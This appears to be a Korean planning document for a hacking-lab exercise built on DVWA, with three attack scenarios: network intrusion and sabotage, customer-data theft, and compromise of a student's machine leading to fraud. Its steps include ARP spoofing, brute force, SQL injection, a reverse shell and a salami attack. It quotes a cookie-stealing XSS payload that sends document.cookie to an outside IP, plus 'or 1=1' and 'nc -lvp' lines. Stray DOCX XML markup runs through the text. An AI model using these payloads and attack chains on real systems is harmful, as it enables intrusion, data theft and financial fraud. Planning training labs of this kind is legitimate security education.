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gpvooy0v1m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&lt;시나리오 1&gt; 블루서버 인근 카페 네트워크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“퇴사자의 원한, 전산망을 마비시켜 복수하자!!!” 퇴사자 A씨와 고용된 해커는 이전 직장 근처 카페에서 공용 와이파이 및 네트워크 패킷 분석을 통해 내부망에 침투하고 시스템을 파괴하고자 한다.”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1zd8drhprc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1. 타겟 식별 및 초기 침투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1) 네트워크 스캔 및 OS 분석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ettercap으로 스캐닝 하고 G/W로 arp spoofing을 진행해서 모든 패킷이 자신을 거쳐갈 수 있도록 설정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패킷을 wireshark로 분석하는 중 FTP 패킷 식별을 한다. (클라이언트 PC &gt;&gt; 웹서버)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업무 이외의 일 제외하고 FTP를 사용하는 경우는 드물기 때문에 혹시 회사에서 일하는 직원은 아닐까 하는 마음에 Source IP주소를 가져와 nmap 수행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nmap을 사용해서 SSH 포트 개방 확인 및 OS(Linux)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2) SSH 크래킹 (hydra)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hydra를 이용하여 클라이언트의 root 계정 비밀번호 무차별 대입(Brute Force) 공격해서 비밀번호 취득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획득한 계정으로 클라이언트 PC에 직접 접속 성공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&gt; 내부 문서 탐색을 통해 해당 PC가 전산팀 관리 책임자임을 확인 (PC 내부에 업무와 관련된 문서들이 존재한다 가정)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scaugyddiv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2. 내부망 확장 및 관리자 권한 획득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1) DNS 정보 탈취 (dig)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root 권한을 탈취한 PC에서 DNS 서버 IP를 확인 및 dig 명령어를 사용하여 Zone File 탈취 시도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취득한 zone파일에 있는 각 도메인들을 whatweb으로 접속하여 관리자 페이지를 식별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2) SQL Injection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관리자 로그인 창에서 SQL Injection 취약점 확인 및 공격 (취약점 점검은 직접 입력해서 점검) – (취약한 관리자 페이지는 레드 폴더에 만들어 놓겠습니다.)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ID/PW 우회 후 관리자 권한으로 로그인 성공 (직접 SQL Injection 코드를 사용해서 로그인 인증 우회 진행)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&gt; 전산팀 관리 페이지 내 점검용 ping 서비스 기능을 통한 추가 공격 지점 확보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2bf5c3uzid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3. 서버 장악 및 시스템 파괴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1) Command Injection (여기는 python 프로그램 돌릴 거예요, 좀만 기다려주세요)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ping 서비스 페이지에 명령어 삽입 취약점이 있음을 확인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시스템 명령어를 실행하여 서버 제어권 획득 시도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2) 리버스 쉘(Reverse Shell) 및 DoS (삽입까지가 프로그램, 실행이랑 리버스 쉘 기법으로 연결은 직접)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Netcat을 사용하여 웹쉘 스크립트 삽입 후 공격자 PC와 리버스 쉘 연결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주요 데이터 탈취 및 흔적 제거(로그 삭제) 후 DoS 공격 수행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&gt; 서버 네트워크 내 모든 장치를 마비시키며 공격 종료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&lt;시나리오2&gt; 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“대형 사이트의 개인정보를 가져와서 큰 돈을 벌어보자!!!”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kali씨는 특정 사이트의 고객들의 개인정보를 가져다가 중국에 팔아버리는 방법으로 큰 돈을 벌어보고자 한다.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사이트 정하기</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023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먼저 외부에 공개되어있는 도메인을 기반으로 해당 서버의 망 내의 취약한 다른 사이트를 알아보자.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  <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="fce5cd" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="fce5cd" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dnsenum / dig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025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공개된 도메인 정보 수집. 외부에 노출된 웹 서버 ip 대역 식별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440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="fce5cd" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="fce5cd" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027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nmap -sS -sV 스캔 결과, 구버전 Apache(http)가 확인되었으며</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028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whatweb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target.com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스캔, 그 결과 PHP 버전도 낮은것을 확인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&gt; kali씨는 구버전 apache(http)과 낮은 php버전을 사용함으로 인해 취약점이 많은걸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   예상하여 스캔이 이루어진 사이트(dvwa)를 공격 대상으로 지정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취약점 확인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1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="fce5cd" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="fce5cd" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflected XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E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dvwa에서 DOM Based XSS문제 칸에서  uri 부분이 취약하다는것을 알 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F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‘/?default=  ‘ 부분이 취약함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URL 생성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031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해당 부분에 쿠키를 탈취할 수 있는 악성스크립트를 넣어서 url 생성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032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&gt; 4-1번, 메일 전송에서 사용할 url을 미리 생성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033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ex) dvwa.ex.com/DVWA/vulnerabilities/xss_d/?default=&lt;script&gt;document.location='&lt;http://1.1.1.4/cookie?'+document.cookie&gt;&lt;/script&gt;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&gt; 사이트의 취약점을 찾고 해당 부분을 reflected xss를 이용하여 쿠키값을 탈취할 수 있는 url을 생성 함.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&gt; 이후 해당 url은 메일을 통해 배포하여 클릭한 사용자를 통해 쿠키값을 탈취에 사용할 예정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036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관리자 계정의 mail 로그인 시도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홈페이지 확인 (회사 소개 홈페이지는 따로 제작 및 제공은 안함)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039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해당 홈페이지에서 관리자 이메일 확인. (말만 그렇다는거다. 실제로는 여기 문제에서 메일을 제공해줄것이다.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A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일반적으로 회사 소개 홈페이지에서 관리자 이메일 정보나 회사정보가 적혀있는것을 알 수 있다. 이러한 사실을 바탕으로 회사 홈페이지에서 관리자의 이메일이 있다고 가정할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B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&gt; 이메일 :  client@localhost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1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="fce5cd" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:fill="fce5cd" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D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확인된 이메일을 기반으로 id 유추 후 mail 서버(roundcube)에서 bruteforce로 로그인 시도</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E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사용 툴은 BurpSuite에서 Intruder 이용. (추후 passwd.txt 파일 제공 예정)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F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ex) client@localhost 이면 id는 client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&gt; 로그인 성공으로 메일함에서 다른 관리자들끼리 주고 받은 메일 확인. 이렇게 다른 관리자들의 메일 주소 획득.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&gt; 만약 실패하면 노가다로 직접 비번 대입해보기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쿠키값 탈취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Mail 이용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045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획득한 관리자들의 메일로 2-2번에서 만든 악성 스크립트가 있는 링크를 넣어서 업무 메일 발송</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046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ex) “ㅇㅇ 입니다. 해당 부분에 ㅇㅇㅇ한 문제가 발생하여 확인 부탁드립니다.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047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[악성 스크립트가 담긴 링크 첨부]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1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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ce5cd" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">사회공학</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049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메일을 확인한 관리자들 중 일부가 해당 링크를 클릭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&gt; 사이트에 로그인된 관리자의 쿠키 값들이 kali씨의 컴퓨터 로그로 전송이 됨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&gt; 쿠키 값 획득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고객 정보 탈취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탈취한 쿠키값과 도메인 정보로 해당 관리자 계정에 파이썬 모듈 requests 를 이용해 로그인 성공</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr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httpd, php 버전이 낮았던 dvwa사이트 회원조회 메뉴에 ‘or 1=1 입력을 해본 후, 해당 검색창이 SQL Injection에 취약함을 확인하고</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:ind w:left="14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UNION SELECT 구문을 사용하여 information_schema 에서 테이블 명을 추출</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052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최종적으로 고객 정보가 담긴 테이블의 모든 데이터 탈취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&lt;시나리오 3&gt; 퍼플 지역 시나리오 (Ubuntu GUI Client &amp; Web Server)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dkhcuo08f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개요 (Overview)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 계정을 활용한 서버 침투 및 비자금 조성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환경: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피해자(Client):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대학생 R (Ubuntu GUI 환경 사용)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(Server):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web서버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진단 목적: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 보안 인식 부재 확인 (사회공학적 기법)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중간자 공격(MitM) 및 세션 탈취(CSRF) 위험성 검증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취약점 진단 (핵심: File Upload, Local File Inclusion)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pqlxawsec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상세 시나리오 흐름 (Step-by-Step)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85dzmpmtc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1: 타겟 식별 및 미끼 투척 (Client-Side)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시험 기간, 대학생 R은 전공 공부를 위해 인터넷 서핑 중 모 블로그에서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OO대학_족보_모음.sh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(또는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교양과목족보개꿀.sh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파일을 발견한다.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R이 파일을 다운로드하여 터미널에서 실행한다.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동작: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실행된 쉘 스크립트는 백그라운드에서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Ubuntu 시스템의 프록시(Proxy)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해커의 서버(Kali)로 강제 변경한다.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해커는 자신의 서버(Burp Suite 등)를 통해 R의 트래픽이 경유하도록 대기한다.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ym1p8cyws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2: 계정 탈취 및 접근 권한 획득 (Network &amp; Auth)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R은 자주 접속하는 사이트에 접속한다.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공격 (Proxy &amp; CSRF):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해커가로챈 세션(Cookie)을 이용해 python의 request로 **비밀번호 변경 요청(CSRF)**을 수행하여, R의 계정 비밀번호를 해커가 지정한 값으로 변경한다.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해커는 변경된 비밀번호를 이용해 학생 R의 계정으로 정상적으로 로그인에 성공한다.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k4a7b7hdo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3: 웹 서버 취약점 공격 (Web Exploitation - 핵심)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정찰 (LFI):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후, 해커는 URL 파라미터 취약점을 이용해 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI(Local File Inclusion)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공격을 시도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내 시스템 파일(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등)을 열람하여 계정 구조 및 웹 서버 설정을 파악한다.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침투 (File Upload):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업로드 기능을 찾는다.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파일로 위장하거나 Content-Type을 변조하여 **웹쉘(Webshell(command가 입력 가능한),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backdoor.php(netcat으로 리버스 쉘 사용한다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)**을 업로드한다.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업로드된 웹쉘의 경로를 파악하여 실행한다.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dmfe5dwmc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4: 서버 장악 및 권한 상승 (Post-Exploitation)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쉘 획득 (Netcat):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해커는 자신의 PC에서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nc -lvp [포트]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대기하고, 웹쉘을 통해 리버스 쉘(Reverse Shell)을 연결한다.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서버의 터미널 제어권을 획득한다.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탈취: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내부를 탐색하여 DB 접속 정보가 담긴 설정 파일(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config.php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)이나 관리자 문서를 확보한다.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관리자계정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탈취한다.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rlohpum3g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5: 최종 목표 달성 (Action on Objectives)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개인정보 탈취 (Phishing):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권한으로 "새해 선물 증정 이벤트" 메일을 발송한다.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피싱 사이트로 유도하여 이름, 주소, 전화번호 등 민감 정보를 대량으로 수집한다.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금전적 이득 (Salami Attack):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탈취한 DB 계정으로 데이터베이스에 직접 접속한다.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회사원들의 월급 계좌 정보 테이블을 조작하여, 소액(10원 단위 등)을 해커의 계좌로 자동이체 되도록 쿼리를 조작하여 비자금을 조성한다.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rget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